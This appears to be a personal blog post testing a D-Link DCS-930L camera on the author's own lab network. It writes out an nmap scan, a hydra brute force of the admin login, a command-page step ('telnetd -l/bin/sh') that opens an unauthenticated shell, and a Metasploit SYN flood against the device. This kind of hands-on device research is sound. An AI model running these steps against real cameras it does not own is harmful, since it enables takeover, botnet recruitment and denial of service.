Internet of Things -- D-Link DCS-930L
- by Vince
-
in Blog
-
Hits: 2429
With the recent talk about hijacking IP cameras for the purposes of creating a bot army, I decided to order a camera. I'd seen this model or one like it in my local lunch place and I ordered one from Amazon. Two days later, I got my target, a "D-Link DCS-930L Wi-Fi Camera with Remote Viewing". Nothing fancy really. Just a $30 camera that can be used wired or wirelessly, but apparently only good for "day use". It will serve my purpose though. Army of one.
Pretending like I don't know where it's located --
nmap -sP -PI 192.168.50.0/24 | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > ip.list
nmap --open -iL ip.list -p 80,443
Starting Nmap 6.47 ( http://nmap.org ) at 2017-01-11 05:28 CST
Nmap scan report for DCS-930LB.sevenlayers.com (192.168.50.141)
Host is up (0.00082s latency).
PORT STATE SERVICE
80/tcp open http
443/tcp open https
MAC Address: B0:C5:54:XX:XX:XX (D-Link International)
The first nmap statement is just a ping scan and I'm redirecting the output to a file. The second nmap statement reads the ip.list file for targets and looks for web servers on port 80 or 443.
I open up my browser, point it to the web interface, and I'm presented, as you would imagine, with a login prompt. My first gripe, the camera is setup with a default user of admin and no password. I'm going to be secure to make this a little more challenging, I'll set it up with the following password: 1982hondacivic
Second gripe -- nothing to prevent a brute force attack. Furiously bashing It with my password list did cause a pause around every 2000 guesses but then it picks up again. I don't think that's a protection mechanism as much as the brute force acting as a DDoS on the camera.
hydra -l admin -P ./BigPassList.txt -e ns -f -V 192.168.50.141 http-get /
After what was probably five minutes --
[80][http-get] host: 192.168.50.141 login: admin password: 1982hondacivic
[STATUS] attack finished for 192.168.50.141 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-01-11 05:47:44
With credentials, I am able to login and perform all of the normal functions. But I also ran a scanner across the directory structure and discovered a few interesting directories and pages.
The following is a list, I've not explored them all but there's other interesting things to play with.
http://192.168.50.141/html.htm
/email.htm -- it can mail things.
Another really interesting page, once authenticated --
http://192.168.50.141/docmd.htm
In the system command prompt, enter: telnetd -l/bin/sh
The above will enable telnet, no authentication required. You now have access to the camera from a command line.
I haven't tried an " rm -r " because I think it will work and I don't want to brick my camera.
And finally, with or without authentication, the following will DDoS this thing into oblivion:
msf auxiliary(synflood) > show options
Module options (auxiliary/dos/tcp/synflood):
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface
NUM no Number of SYNs to send (else unlimited)
RHOST 192.168.50.141 yes The target address
RPORT 80 yes The target port
SHOST no The spoofable source address (else randomizes)
SNAPLEN 65535 yes The number of bytes to capture
SPORT no The source port (else randomizes)
TIMEOUT 500 yes The number of seconds to wait for new data
msf auxiliary(synflood) > run
[*] SYN flooding 192.168.50.141:80...